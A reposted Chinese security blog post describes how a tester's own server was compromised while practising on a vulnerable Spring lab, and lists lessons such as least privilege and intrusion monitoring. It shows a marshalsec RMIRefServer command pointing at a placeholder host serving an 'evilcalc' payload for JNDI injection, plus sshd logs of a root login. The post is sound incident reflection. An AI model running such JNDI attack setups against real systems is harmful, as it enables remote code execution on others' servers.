|
仓库地址
https://github.com/bansh2eBreak/SpringVulnBoot-backend
# 通过python启动简易web
python -m http.server 8088
# 通过marshalsec启动RMIRefServer
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://x.x.x.x:8088/#evilcalc" 9999
Feb1115:10:26VM-0-12-centos sshd[23558]: Failed password for root from193.176.211.30 port 13191 ssh2
Feb1115:10:51VM-0-12-centos sshd[23693]: Accepted publickey for root from193.176.211.30 port 52508ssh2: RSASHA256:TrwKr6CbW5a5XW9tVe4bX7WInL82j6n0yJ84726h76o
0x04、教训与反思
-
最小权限原则:
-
在测试时,尽量避免将敏感目录(如 /root)直接映射出去。可以使用一个临时目录,仅暴露必要的文件。
-
限制访问范围:
-
使用防火墙或安全组限制相关服务(http/ssh等)的访问 IP,仅允许可信 IP 访问。
-
及时关闭测试服务:
-
测试完成后,立即关闭 HTTP 服务器,避免长时间暴露在公网。
-
监控与告警:
-
部署主机入侵检测系统(如 OSSEC),实时监控异常登录和文件修改。
-
设置告警规则,及时发现并响应安全事件。
原文始发于微信公众号(安全随笔):【网友投稿】安全人员也被黑了~
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论